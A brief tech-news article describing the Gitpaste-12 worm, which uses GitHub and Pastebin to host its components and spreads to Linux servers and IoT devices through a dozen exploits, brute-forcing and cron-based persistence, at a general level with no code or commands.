Gitpaste-12 malware is targetting you through GitHub

Loredana Harsana
by Loredana Harsana
Editor
0 Comments
Download PDF
Affiliate Disclosure

  • Linux based x86 servers and Linux ARM/MIPS based IoT devices may turn into a Gitpaste-12 target.
  • Gitpaste-12 is a new worm that uses GitHub and Pastebin. Take a look below to find more about it.
  • To easily get rid of malware and other threats, use the tips described in our Removal Guides section.
  • Moreover, bookmarking this Security & Privacy Software Hub could be a smart choice for the future.
Gitpaste-12 malware target

Gitpaste-12 is a recently discovered worm that uses GitHub and Pastebin for housing component codes and exploiting over 12 vulnerabilities.

Therefore, this malware is known as Gitpaste-12 because of the usage of GitHub and Pastebin, also having at least 12 different attack modules.

At the moment, targets include Linux based x86 servers, along with Linux ARM and MIPS based IoT devices.

The first GitPaste-12 first attacks were detected by Juniper Threat Labs. The report released by Juniper Threat Labs reveals:

The first phase of the attack is the initial system compromise. (…) This worm has 12 known attack modules and more under development. 

How does Gitpaste-12 spread?

Gitpaste-12 spread

After this initial phase, the worm seems to have a precise mission: it identifies known exploits and may attempt to brute force passwords.

When a system is compromised, Gitpaste-12 sets up a cron job it downloads from Pastebin, which executes the same script again each minute.

This efficient mechanism is most likely used to push cron jobs updates to the botnet. As already confirmed, the Gitpaste-12 malware also contains a script that launches attacks against other machines.

It’s the way this worm tries to replicate, starting with random /8 CIDR attacks over all addresses within its range.

Knowing the Gitpaste-12 location and the fact that it can spread that easily, are you about to keep on using GitHub? Let us know your thoughts on this in the comments area below.